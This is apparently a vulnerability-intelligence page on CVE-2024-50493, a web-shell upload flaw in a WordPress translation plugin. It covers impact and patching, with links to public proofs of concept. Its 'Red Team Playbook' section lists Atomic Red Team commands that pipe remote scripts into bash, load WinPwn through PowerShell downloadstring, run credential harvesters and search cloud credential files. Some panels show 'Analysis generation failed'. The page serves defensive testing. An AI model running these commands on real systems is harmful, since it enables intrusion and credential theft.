CVE-2024-50493
Overview
This vulnerability is an unrestricted file upload flaw classified under CWE-434. The root cause lies in the failure of the masterhomepage Automatic Translation plugin to properly validate or restrict the types of files uploaded via its upload functionality. Specifically, the component responsible for handling file uploads does not enforce restrictions on dangerous file types, allowing malicious files to be uploaded to the web server.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in masterhomepage Automatic Translation automatic-translation allows Upload a Web Shell to a Web Server.This issue affects Automatic Translation: from n/a through <= 1.0.4.
Impact
An unauthenticated attacker can upload a malicious web shell to the server, enabling full remote code execution with the privileges of the web server process. This can lead to complete system compromise, including data theft, service disruption, and lateral movement within the network. No user interaction or authentication is required to exploit this vulnerability, making it highly accessible to remote attackers.
Solution
Upgrade the masterhomepage Automatic Translation plugin to version 1.0.5 or later, where this arbitrary file upload vulnerability has been addressed. Detailed patch instructions and updates are available at the Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/automatic-translation/vulnerability/wordpress-automatic-translation-plugin-1-0-4-arbitrary-file-upload-vulnerability?_s_id=cve. Applying this update will enforce proper file type validation and prevent unauthorized uploads.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with unrestricted file uploads in the Automatic Translation feature of a web application presents a significant security risk. This flaw allows an attacker to upload files with dangerous types, such as web shells, directly to the server. The lack of stringent validation mechanisms for file types and content enables malicious actors to bypass security controls, leading to unauthorized access and control over the web server. The vulnerability is particularly concerning as it affects versions of the Automatic Translation tool up to and including 1.0.4, leaving many installations exposed to potential exploitation.
Attack vectors for this vulnerability are straightforward and can be executed with minimal technical expertise. An attacker can craft a malicious file, such as a PHP web shell, and use the file upload functionality of the Automatic Translation feature to upload it to the server. Once the file is successfully uploaded, the attacker can execute commands on the server, manipulate data, or even pivot to other systems within the network. This exploitation can occur through various means, including social engineering tactics to trick users into uploading the malicious file or directly targeting the upload functionality through automated scripts. The simplicity of the attack makes it accessible to a wide range of threat actors, from novice hackers to more sophisticated adversaries.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on the affected product for their operations. Successful exploitation can lead to data breaches, unauthorized access to sensitive information, and potential disruption of services. The presence of a web shell on the server can facilitate further attacks, including lateral movement within the network, data exfiltration, and the deployment of additional malware. The business risks associated with such incidents are substantial, encompassing financial losses, reputational damage, and regulatory penalties, particularly if sensitive customer data is compromised. Organizations may also face increased scrutiny from stakeholders and regulatory bodies, further compounding the impact of a successful attack.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. First, thorough input validation and sanitization should be enforced on all file uploads to ensure that only safe file types are accepted. This can include implementing strict whitelisting of allowed file types and employing file scanning technologies to detect potentially malicious content. Additionally, organizations should regularly update their software to the latest versions, as newer releases often contain security patches that address known vulnerabilities. Monitoring and logging of file upload activities can also help in detecting suspicious behavior, allowing for timely intervention before significant damage occurs.
In conclusion, the unrestricted file upload vulnerability in the Automatic Translation feature poses a critical threat to web applications, with the potential for devastating consequences if exploited. Organizations must prioritize the implementation of robust security measures, including stringent file validation, regular software updates, and proactive monitoring, to safeguard against this and similar vulnerabilities. By adopting a comprehensive security posture, businesses can mitigate the risks associated with file upload vulnerabilities and protect their assets from malicious actors.
CSURFACE threat intelligence has identified a significant shift in the exploitation landscape for CVE-2024-50493. A public proof-of-concept exploit has emerged on GitHub, enabling unauthenticated arbitrary file uploads that can lead to web shell deployment on affected systems. This development has elevated the CVSS score to a critical 10.0 and introduced a substantial EPSS score, reflecting a heightened likelihood of exploitation in the wild. Our telemetry indicates that exploitation tools leveraging this vulnerability are now accessible to a broader attacker base, increasing the risk of widespread compromise. The presence of a stable yet high EPSS score underscores persistent attacker interest and the potential for sustained exploitation campaigns. Consequently, the threat level has escalated from theoretical to imminent, demanding heightened vigilance from defenders as adversaries can now more readily weaponize this vulnerability without requiring authentication.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
RandomRobbieBF/CVE-2024-50493
Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload
|
RandomRobbieBF | 0 | 0 | 2024-11-10 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50493 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/automatic-translation/vulnerability/wordpress-automatic-translation-plugin-1-0-4-arbitrary-file-upload-vulnerability?_s_id=cve |